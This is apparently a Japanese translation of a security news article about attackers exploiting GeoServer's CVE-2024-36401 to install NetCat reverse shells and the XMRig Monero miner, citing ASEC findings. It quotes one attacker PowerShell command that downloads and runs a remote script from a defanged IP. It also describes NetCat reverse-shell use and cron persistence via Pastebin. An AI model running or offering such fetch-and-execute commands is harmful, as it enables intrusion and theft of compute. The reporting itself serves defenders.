Hackers Exploiting GeoServer RCE Vulnerability to Deploy CoinMiner
2025/07/10 CyberSecurityNews — GeoServer に存在する、深刻なリモート・コード実行の脆弱性を標的とするサイバー犯罪者たちが、世界中のネットワークに対して暗号資産マイニング・マルウェアを展開している。この脆弱性 CVE-2024-36401 は、Java で構築された人気のオープンソース Geographic Information System (GIS) に影響を与えるものだ。世界各地の多数の組織に対して、この GeoServer から、空間データ処理のための基盤が提供されている。
この脆弱性が 2024年に公開された以降において、脅威アクターたちはパッチ未適用の GeoServer を標的とし、積極的な悪意のコード実行の攻撃を仕掛け続けている。
サイバー犯罪者たちは、脆弱なサーバへの体系的なスキャンにより、攻撃を急速に拡大し、高度なマルウェア・ペイロードを展開している。その中には、リモート・アクセス・ツールと暗号資産マイナーが取り込まれているという。
このマルウェアキャンペーンは、技術的に洗練された持続性の高い活動であり、脆弱な GeoServer を稼働させる Windows/Linux 環境を標的としている。
ASEC のアナリストたちが確認した、韓国における複数の攻撃事例では、 Windows ベースの GeoServer デプロイメント環境が、脅威アクターたちにより侵害されているという。これらのシステムでは、脆弱性 CVE-2024-36401 を修正するための、セキュリティ・パッチが適用されていなかった。
この攻撃手法が示すのは、PowerShell コマンドを通じたリモート・コード実行から始まる、多段階の感染プロセスである。
それらの確認された事例において、攻撃者は悪意の PowerShell スクリプトを実行し、NetCat をダウンロード/インストールしていた。この NetCat は、リバース・シェルとして機能するネットワーク・ユーティリティであり、侵害したシステムに対する持続的なリモートアクセスを提供する。
NetCat のインストールは “-e” オプションを用いて行われ、Command and Control (C2) サーバへの接続が確立されていた。それにより、標的システムは継続的に操作される状態となる。
暗号資産マイニングの展開と持続性メカニズム
これらの攻撃の主目的は、XMRig の展開にある。XMRig は Monero の暗号資産をマイニングするツールであり、システム・リソースを不正に奪って採掘を行うものだ。
侵害したプラットフォームに応じた戦術を採用する脅威アクターたちは、Windows 環境には PowerShell スクリプトを、Linux 環境には Bash スクリプトを用いて、マイナーを展開している。
Windows 版では、以下のコマンドが実行され、XMRig コンポーネントの取得とインストールが行われる。
scssCopyEditIEX(New-ObjectNet.WebClient).DownloadString('hxxp://182.218.82.[1]4/js/1/gw.txt')
また、Linux 版では、XMRig のインストールに加えて、Cron ジョブを登録することで、追加の持続性メカニズムも実装されている。それにより、このマルウェアは、システム再起動後も継続的に稼働可能となる。
これらの Cron ジョブは、Pastebin からスクリプトをダウンロードして実行する仕組みをとっており、複数の持続レイヤを構築することで、さらに除去を困難にしている。
一連のマイニング活動では、pool.supportxmr.com:443 への接続が確立されており、攻撃者の管理下にあるウォレットに対して、Monero がダイレクトに生成される。それにより、標的となったシステムの性能は著しく低下し、運用コストも増大していく。
GeoServer の脆弱性を突く攻撃では、脆弱性 CVE-2024-36401 が悪用され、暗号資産マイナーが展開されているようです。システムへの負荷も大きく、放置すると業務に深刻な影響が出かねないと、この記事は指摘しています。ご利用のチームは、ご注意ください。よろしければ、CVE-2024-36401 で検索も、ご参照ください。
IoT OT Security News 
You must be logged in to post a comment.